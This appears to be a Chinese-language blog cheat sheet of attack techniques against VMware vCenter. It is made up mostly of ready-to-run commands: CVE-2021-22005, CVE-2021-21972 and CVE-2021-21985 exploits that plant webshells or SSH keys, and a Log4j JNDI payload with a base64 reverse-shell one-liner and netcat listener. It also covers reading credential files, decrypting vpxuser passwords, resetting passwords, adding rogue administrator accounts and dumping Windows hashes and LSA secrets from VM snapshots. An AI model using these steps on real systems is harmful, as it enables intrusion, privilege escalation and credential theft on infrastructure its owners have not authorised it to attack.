Life has its own fate, and meeting may not be accidental.

0%

vCenter常用攻击手法

查看版本信息

1
/sdk/vimServiceVersions.xml

0x01 cve-2021-22005

1.1 影响范围:

  • vCenter Server 7.0 < 7.0 U2c build-18356314

  • vCenter Server 6.7 < 6.7 U3o build-18485166

  • Cloud Foundation (vCenter Server) 4.x < KB85718 (4.3)

  • Cloud Foundation (vCenter Server) 3.x < KB85719 (3.10.2.2)

    6.7 vCenters Windows版本不受影响

1
python3 .\exp.py -t https://192.168.52.152 -s api_all_jdk.jsp

image.png
连接木马,默认路径/storage/db/vmware-vmdir/data.mdb
image.png

1.2 vcenter_saml_login

db数据库存放位置

1
2
3
数据库存放路径
Windows vCenter:C:/ProgramData/VMware/vCenterServer/data/vmdird/data.mdb
Linux vCenter:/storage/db/vmware-vmdir/data.mdb

拖到本地利用:vcenter_saml_login
配置cmd代理,利用netch到本地127.0.0.1:1080

1
python3 vcenter_saml_login.py -p data.mdb -t 10.118.11.220

image.png
修改cookie进行连接
image.png

0x02 CVE-2021-21972

影响范围

  • vCenter Server7.0 < 7.0.U1c
  • vCenter Server6.7 < 6.7.U3l
  • vCenter Server6.5 < 6.5.U3n
    1
    /ui/vropspluginui/rest/services/uploadova
    访问上面的路径,如果404,则代表不存在漏洞,如果405 则可能存在漏洞。

2.1 windows机器:

漏洞利用: https://github.com/horizon3ai/CVE-2021-21972

1
2
3
4
5
python CVE-2021-21972.py -t x.x.x.x -p c:\\ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport\gsl.jsp -o win -f gsl.jsp

-t (目标地址)
-f (上传的文件)
-p (上传后的webshell路径,默认不用改)

上传后路径

1
2
https://x.x.x.x/statsreport/gsl.jsp
C:/ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport

image.png

2.2 linux机器

1、写公私钥(需要22端口开放)

1
python3 CVE-2021-21972.py -t 10.16.8.168 -p /home/vsphere-ui/.ssh/authorized_keys -o unix -f c://Users/think/.ssh/id_rsa.pub

2、遍历写shell(时间较久)
https://github.com/NS-Sp4ce/CVE-2021-21972
image.png

0x03 CVE-2021-21985

1
2
3
4
5
java -cp  JNDI-Injection-Bypass-1.0-SNAPSHOT-all.jar payloads.EvilRMIServer 8.8.8.8

nc -lvvp 55552

python3 cve-2021-21985.py https://host rmi://8.8.8.8:1099/Exploit

0x04 Log4j

${jndi:ldap://exp}

1
2
3
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "cmd /c whoami" -A "172.30.84.134"

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,base编码内容}|{base64,-d}|{bash,-i}" -A "ip"

image.png

0x05 vmware未授权任意文件读取漏洞

5.1、漏洞影响版本

已知影响版本 VMware vCenter 6.5.0a-f
安全版本 VMware vCenter 6.5u1

1
2
3
4
5
#windows
/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties

#linux
/eam/vib?id=/etc/passwd

image.png

0x06 vCenter低权限账户提权思路

6.1、获取ssh权限后修改密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#Linux 
/usr/lib/vmware-vmdir/bin/vdcadmintool

#Windows
C:\Program Files\Vmware\vCenter Server\vmdird\vdcadmintool.exe


# 输入3回车
# 然后输入用户名(用户名输入错误会提示:VmDirForceResetPassword failed (9106))
# 复制生成的新密码(新密码不能自定义,只能工具生成的)
==================
Please select:
0. exit
1. Test LDAP connectivity
2. Force start replication cycle
3. Reset account password
4. Set log level and mask
5. Set vmdir state
6. Get vmdir state
7. Get vmdir log level and mask
==================

6.2、Vmware数据库配置文件

1
2
3
4
5
6
# linux
/etc/vmware-vpx/vcdb.properties
/etc/vmware/service-state/vpxd/vcdb.properties

# windows
C:\ProgramData\VMware\vCenterServer\cfg\vmware-vps\vcdb.properties

image.png

连接数据库,读取 vpxuser 密钥

1
2
3
4
5
# linux
/opt/vmware/vpostgres/current/bin/psql -h 127.0.0.1 -p 5432 -U vc -d VCDB -c "select ip_address,user_name,password from vpx_host;" > password.enc

#windows
C:\Program Files\VMware\vCenter Server\vPostgres\bin\psql.exe -h 127.0.0.1 -p 5432 -U vc -d VCDB -c "select ip_address,user_name,password from vpx_host;" > password.enc

6.3、获取symkey.dat文件

1
2
3
4
5
# linux
/etc/vmware-vpx/ssl/symkey.dat

# windows
C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\ssl\symkey.dat

解密 vpxuser 密码

1
python3 decrypt.py symkey.dat password.enc password.txt

6.4、拿到权限后添加账户

添加账户

1
2
python vCenterLDAP_Manage.py adduser
input the new username: 1234admininput the dn: cn=1234admin,cn=Users,dc=vsphere,dc=localinput the userPrincipalName: 1234admin@vsphere.local

提升至管理员

1
python vCenterLDAP_Manage.py addadmininput the user dn: cn=1234admin,cn=Users,dc=vsphere,dc=local

0x07后续

7.1、创建快照

image.png
分析快照文件需要.vmem文件作为参数,而.vmem文件通常很大,为了提高效率,这里选择将volatility上传至VMware ESXI,在VMware ESXI上分析快照文件。

volatility下载:【Windows】、【Linux

7.2 volatility利用

7.2.1、通过镜像信息获得系统版本,命令如下
1
.\volatility_2.6_win64_standalone.exe -f xxxx-Snapshot2.vmem imageinfo
7.2.2、读取profile,列出注册表内容
1
2
3
4
5
.\volatility_2.6_win64_standalone.exe -f xxx-Snapshot2.vmem --profile=xxx hivelist

## 关注
REGISTRY\MACHINE\SYSTEM
SystemRoot\System32\Config\SAM
7.2.3、使用hashdump获取hash值
1
.\volatility_2.6_win64_standalone.exe -f xxx-Snapshot2.vmem --profile=xxx hashdump -y 0xfffff8a000024010 -s 0xfffff8a000478010
7.2.4、从注册表读取LSA Secrets
1
.\volatility_2.6_win64_standalone.exe -f xxx-Snapshot2.vmem --profile=xxx lsadump
7.2.5、导出所有域用户hash

参考

https://forum.butian.net/share/1893